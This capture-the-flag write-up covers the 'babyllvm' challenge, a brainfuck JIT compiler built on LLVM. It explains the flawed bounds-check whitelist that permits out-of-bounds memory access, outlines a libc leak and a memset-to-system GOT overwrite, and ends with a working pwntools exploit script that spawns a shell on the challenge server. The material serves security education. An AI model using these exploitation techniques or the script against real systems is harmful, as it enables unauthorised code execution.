February 12, 2020

babyllvm (pwn702)

Everything is JITted these days…

Challenge running on Ubuntu 18.04

challenge.zip

In the zip file, we are given a Dockerfile that describes the setup of the challenge, and a folder with 2 files, main.py and runtime.so.

main.py is the main program that reads brainfk code as input, then performs JIT compilation on the code using LLVM and executes it. runtime.so is a library that provides functions such as for reading input/writing output, or for memory allocation.

For this challenge, the server runs main.py. So the main objective for this challenge is to provide malicious bf code that triggers a bug during the compilation phase so that we can obtain code execution on the system.

Here is an overview of the bf programming language. In summary it only has 4 types of instructions operating on a pointer in a memory region, and another instruction for control flow (if/loop).

Move the pointer
Increment/decrement the cell under the pointer
Print the cell under the pointer
Read input and store to the cell under the pointer

In this writeup, pointer will be used to refer to this pointer that is used by the bf program.

JIT compilation

This tutorial shows how to implement a compiler for a simple programming language. The concepts in the tutorial are very helpful for understanding what goes on inside main.py.

You can refer to main.py here.

Parser

First thing to look at is the parser, implemented in bfProgram here.

What happens here is quite straightforward, the parser detects the square brackets to split the program into parts, and converts tokens to instructions.

The instructions are in the form (opcode, value):

0: nop
1: move pointer
2: add to cell under pointer
3: print cell under pointer
4: read to cell under pointer

For example, <<>>> is turned into (1, 1), and +--- is turned into (2, -2).

On the other hand, when the compiler detects a square bracket, the bf program is split into 3 parts, of the form <head><br1><br2>, and this is done recursively if there still are brackets in br2. Each part will then be parsed individually.

For example, ++--[.+-<]--++[<>+] is first split into ++--, [.+-<] and --++[<>++], the the last part is again split into --++ and [<>++].

if x == '>':
    if state == 1:
        imm += 1
    else:
        self.shortened_code.append((state, imm))
        state = 1
        imm = 1
elif x == '<':
    if state == 1:
        imm -= 1
    else:
        self.shortened_code.append((state, imm))
        state = 1
        imm = -1
elif x == '+':
    if state == 2:
        imm += 1
    else:
        self.shortened_code.append((state, imm))
        state = 2
        imm = 1
elif x == '-':
    if state == 2:
        imm -= 1
    else:
        self.shortened_code.append((state, imm))
        state = 2
        imm = -1
elif x == '.':
    if state == 3:
        imm += 1
    else:
        self.shortened_code.append((state, imm))
        state = 3
        imm = 1
elif x == ',':
    if state == 4:
        imm += 1
    else:
        self.shortened_code.append((state, imm))
        state = 4
        imm = 1

Code Generation

After parsing the bf program, the compiler is ready to generate code in the form of LLVM IR (intermediate representation). This part is the most important because it is where the vulnerability lies. It is implemented in the codegen method of the bfProgram class here.

There are two things that the compiler handles here, a linear sequence of instructions, and branches.

Linear code

First let’s look at the way linear code is handled, implemented here. LLVM uses blocks to represent blocks of code. It is quite straightforward, instructions are just added to the end of the block.

Every opcode corresponds to a series of LLVM IR instructions. For example, opcode 1 turns into load from a pointer, add a constant to the pointer, store the new value in that same location.

elif op == 1:
    if imm != 0:
        ori = builder.ptrtoint(builder.load(dptr_ptr), i64)
        incr = llvmIR.Constant(i64, imm)
        new = builder.inttoptr(builder.add(ori, incr), i8_ptr)
        builder.store(new, dptr_ptr)
        rel_pos += imm

But for opcodes 2, 3 and 4, there is this extra piece of code.

if not is_safe(rel_pos, whitelist_cpy):
    print(self.code)
    sptr = builder.load(sptr_ptr)
    cur = builder.ptrtoint(dptr, i64)
    start = builder.ptrtoint(sptr, i64)
    bound = builder.add(start, llvmIR.Constant(i64, 0x3000))
    builder.call(ptrBoundCheck, [start, bound, cur])
    whitelist_cpy = whitelist_add(whitelist_cpy, rel_pos)

What this does is it first checks if rel_pos is present inside whitelist_cpy. rel_pos is the relative position of the pointer from the start of the memory region, and whitelist_cpy is a tuple of 2 values, describing the range that is valid for the pointer. If rel_pos is not within the range described by whitelist_cpy, a call instruction to the ptrBoundCheck function will be added to the block. ptrBoundCheck is defined in runtime.so that just checks if a value is between 2 other values.

void ptrBoundCheck(ulong start,ulong bound,ulong cur)
{
  if ((start <= cur) && (cur <= bound)) {
    return;
  }
  fprintf(stderr, "assert (0x%lx < 0x%lx < 0x%lx)!!\n", start, cur, bound);
  exit(-1);
}

I think by using the whitelist range, the compiler tries to optimize this part, such that each relative position is only checked once in the final program. Otherwise there would be one call to ptrBoundCheck for every bf instruction and this is obviously not efficient.

Since the compiled program checks if the pointer is within the valid memory region, the program is perfectly safe, as we are not able to manipulate the pointer to perform an out of bounds read or write.

Branching

As mentioned earlier, when there are square brackets, the program will be split into parts, and these parts will be handled individually, and this is done recursively. So after LLVM IR code is generated for each block, obviously the compiler needs to link them together, with either conditional or unconditional branches. This part of the code implements this.

Quite similar to the previous part, but notice that instead of is_safe(rel_pos, whitelist) checked in the previous part, this part checks is_safe(0, whitelist).

Notice the following code used for performing code generation on separate parts of the program.

headb = self.head.codegen(module)
br1b = self.br1.codegen(module, (0, 0))
br2b = self.br2.codegen(module, (0, 0))

For the 2nd and 3rd part, a whitelist of (0, 0) is passed into the codegen method. This means is_safe(0, whitelist_cpy) will return true, and the call to ptrBoundsCheck will not be added to the block.

Setup

The rest of the code is just setting up memory and the environment to execute the compiled program, not so important. The only thing to know is the data memory region for the bf program lies in the .bss region, and memset is called to set everything in there to 0.

The program also stores 2 pointers before the data, one is the start of the data region, another is the pointer used by the bf program. The memory layout is as shown below.

.bss
[start pointer][current pointer][data...
   |                               ^
   ---------------------------------

What happens afterwards is in summary, main.py loads runtime.so into memory, inserts the compiled bf program in there, then runs it.

Vulnerability

Consolidating what we know, let’s see how this part results in a vulnerability. There are 3 things to notice:

1. No bounds check for opcode 1

The compiler does not add a check for whether the pointer is outside the memory region for opcode 1. This means that we are technically allowed to move the pointer out of the valid memory region, as long as we do not call the other types of instructions.

elif op == 1:
    if imm != 0:
        ori = builder.ptrtoint(builder.load(dptr_ptr), i64)
        incr = llvmIR.Constant(i64, imm)
        new = builder.inttoptr(builder.add(ori, incr), i8_ptr)
        builder.store(new, dptr_ptr)
        rel_pos += imm

2. is_safe(0, whitelist)

As mentioned in the previous part, the compiled program also does not check if the pointer is out of bounds when branching to another block of code.

3. rel_pos = 0

Notice that at the start of the linear part of codegen, there is rel_pos = 0. But what if at this point, the pointer is not at the start of the valid memory region, then the relative position is off, and we can achieve out of bounds read/write here.

Combining these 3, we can

Move the pointer out of bounds
Branch to a different block of code
Now the relative position is off

For example, [.]<[.]+.

The program is split into [.] and <[.]+, which is split further into <, [.] and +.

[.] does nothing according to the bf specification, because when executing [, the cell under the pointer contains 0, and will skip to ].
< moves the pointer to a relative position of -1. Now the pointer is already one byte outside the valid memory region.
[.] does nothing again because the value of the cell under the pointer is 0. (Recall the memory layout shown above, the pointer now points to the most significant bit of the data pointer, which is 0)
Now + increments that cell under the pointer.

This can be verified in GDB.

Exploitation

To debug the exploit, just load python in GDB, and use vmmap (from gef) or info proc mappings to find the memory region for runtime.so. The data region of the compiled bf program can be found in the .bss region in there.

The exploitation strategy is quite standard:

Round 1

Change start pointer to the GOT so that even when there are bounds checks we don’t need to worry about them later.
Move data pointer to the GOT
Leak memset base to get libc base

Round 2

Overwrite memset with system
Write /bin/sh to the data region

Round 3

Since everytime at the start, the program will memset the data region with 0s, and memset is replaced with system, the program will call system("/bin/sh").

You can refer to this exploit written by @Lord_Idiot.

#!/usr/bin/python
from pwn import *
import sys

config = {
	"elf" : "/usr/local/bin/python3",
	"libc" : "./libc-2.27.so",#"/lib/x86_64-linux-gnu/libc-2.23.so",
	"HOST" : "58.229.240.181",
	"PORT" : 7777
}

def exploit(r):
	# leak libc
	r.sendlineafter(">>> ", "[.]<<<<<<<<[.,<<<<<<<<]>>>>>>>>>[.>]")
	r.sendafter(chr(0x90), chr(0x30-1))
	r.sendafter(chr(0x80), chr(0x30-1))
	libc_base = u64(r.recvn(6).ljust(8, '\x00'))-libc.symbols["read"]
	log.info("libc_base: {:#x}".format(libc_base))

	# prepare /bin/sh
	r.sendlineafter(">>> ", "+.,>,>,>,>,>,>,>,<<<<<<<"+"[<<<<<<<<[.,<<<<<<<<]>>>>>>>>>.[,>]]")
	r.sendafter(chr(1), "/bin/sh\x00")
	r.sendafter(chr(0x90), chr(0x28-1))
	r.sendafter(chr(0x80), chr(0x28-1))
	r.recvn(1)
	r.send(p64(libc_base+libc.symbols["system"])[:-2])
	r.interactive()

	return

if __name__ == "__main__":
	if "elf" in config.keys() and config["elf"]:
		e = ELF(config["elf"])
	if "libc" in config.keys() and config["libc"]:
		libc = ELF(config["libc"])

	if "remote" in sys.argv:
		r = remote(config["HOST"], config["PORT"])
	else:
		r = process([config["elf"], "./main.py"])

		print util.proc.pidof(r)
		if "debug" in sys.argv:
			pause()

	exploit(r)